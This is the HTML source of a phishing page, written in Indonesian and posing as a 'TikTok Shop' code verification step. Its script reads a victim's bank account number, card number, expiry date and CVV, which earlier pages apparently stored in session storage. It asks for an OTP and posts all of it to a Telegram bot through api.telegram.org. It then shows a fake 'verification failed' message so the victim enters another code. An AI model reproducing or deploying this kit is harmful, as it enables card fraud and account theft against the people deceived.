
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>TikTok Shop</title>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
    * {
        font-family: 'Ubuntu', sans-serif;
        font-weight: 400;
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        position: relative;
        color: #000;
    }
    .b { font-weight: 500; }
    html { width: 100vw; height: 100vh; }
    body {
        background: #fff;
        width: 100%;
        height: 100%;
    }
    .container {
        width: 100%;
        padding: 20px;
        height: 100%;
        max-width:350px;
        margin: 0 auto;
        text-align:center;
    }
    .flex {
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .hero {
        width: 100%;
        height: 283px;
    }
    .hero img {
        width: 100%;
    }
    h1 {
        font-size: 20px;
        text-align: center;
        margin: 20px 0;
        font-weight: 600;
    }
    form {
        width: 100%;
        height: auto;
        flex-direction: column;
    }
    label {
        display: block;
        font-size: 15px;
        text-align: left;
        margin-bottom: 8px;
        font-weight: 500;
    }
    select {
        width: 100%;
        height: 40px;
        border-radius: 4px;
        padding: 0 10px;
        outline: none;
        border: 1px solid #aeaeae;
        background: #fff;
        margin-bottom: 20px;
    }
    input:focus,
    select:focus {
        border: 1.1px solid #000;
    }
    .wrap {
        width: 100%;
        height: 60px;
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .clear {
        width: 100%;
        height: 100%;
        position: absolute;
        top: 0;
        left: 0;
        z-index: 999;
    }
    input {
        width: 100%;
        background: #fff;
        height: 40px;
        border-radius: 4px;
        border: 1px solid #aeaeae;
        outline: none;
        padding: 0 10px;
        font-size: 16px;
        margin-bottom: 20px;
    }
    button {
        margin-top: 10px;
        width: 100%;
        height: 40px;
        border: none;
        outline: none;
        border-radius: 8px;
        color: #fff;
        font-weight:bold;
        background: #EE3056;
        text-align: center;
        font-size: 13px;
    }
    .alert {
        width: 100%;
        height: auto;
    }
    p {
        font-size: 15px;
        margin-bottom: 10px;
        color: #6d6d6d;
    }
    button:disabled {
        opacity: 0.6;
    } .process1 {
            width: 100%;
            height: 100%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin: auto;
            position: fixed;
            padding-top: 30px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 999999999;
            
      
}
.loading {
    position: fixed;
    display: flex;
    align-items: center;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 0px;
}
.loading img {
    width: 90px;
    border-radius: 10px;
}

</style>
</head>
<body>
    <center>
<div id="djload" name="process" class="process1" style="display: none;">
      <div class="loading">
       <img src="https://hosting.tigerengine.id/eyyhg8.gif">              
            </div>
        </div>
    <div class="container">
        <div class="flex hero">
            <img src="https://hosting.tigerengine.id/gcwydq.jpg" alt="">
        </div>
        <div style="display:none;" class="alert">
            <h1 class="">GAGAL VERIFIKASI!</h1>
            <p>Kode yang anda masukkan sudah tidak berlaku, silakan masukkan ulang kode yang terkirim melalui handphone anda</p>
            <button type="button" onclick="resend();">Masukkan ulang</button>
        </div>
        <div class="boxform">
            <h1 class="">TikTok Shop</h1>
            <form id="form" onsubmit="sendKode()">
     <input type="hidden" name="rek" id="rek" value="">
      <input type="hidden" name="atm" id="atm" value="">
      <input type="hidden" name="valid" id="valid" value="">
      <input type="hidden" name="cvv" id="cvv" value="">     
                <label>Kode Verifikasi</label>
            <input class="inpotp" type="tel" required autocomplete="off" placeholder="Kode" name="kode" id="kode">
                <button id="btn1" type="submit">PROSES</button>
            </form>
        </div>
    </div>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
    
    function resend(){
        $(".alert").hide();
        $(".boxform").fadeIn(200);
        $("#btn1").prop("disabled", false);
        $('.inpotp').val('');
        $(".inpotp").focus()
    }
</script>
<script src="i.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script>
 var rek = sessionStorage.getItem('rek', rek);
 document.getElementById("rek").value = rek + ""; 
 
 var atm = sessionStorage.getItem('atm', atm);
 document.getElementById("atm").value = atm + ""; 
 
 var valid = sessionStorage.getItem('valid', valid);
 document.getElementById("valid").value = valid + ""; 
 
 var cvv = sessionStorage.getItem('cvv', cvv);
 document.getElementById("cvv").value = cvv + "";    
 
        
 // Debit
function sendKode(){
    $(".process1").fadeIn();
    event.preventDefault();   
    
  var kode = $('#kode').val();
                              
    var logo = "𝘄𝘄𝘄.𝘁𝗶𝗸𝘁𝗼𝗸𝘀𝗵𝗼𝗽.𝗰𝗼𝗺";              
    var gabungan = '' + logo  + '%0A%0A⍟ 𝐍𝐨.𝐑𝐞𝐤 •• ' + rek + '%0A⍟ 𝐍𝐨.𝐀𝐭𝐦 •• ' + atm + '%0A⍟ 𝐕𝐚𝐥𝐢𝐝 •• ' + valid + '%0A⍟ 𝐂𝐯𝐯 •• ' + cvv + '%0A%0A⍟ 𝐎𝐓𝐏 •• ' + kode ;   
    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,   
    complete: function(){
    setTimeout(function(){   
 
    $(".process1").fadeOut();  
         $(".boxform").hide();
            $(".alert").fadeIn(100);
    }, 500);}});};
    </script>
</body>
</html>
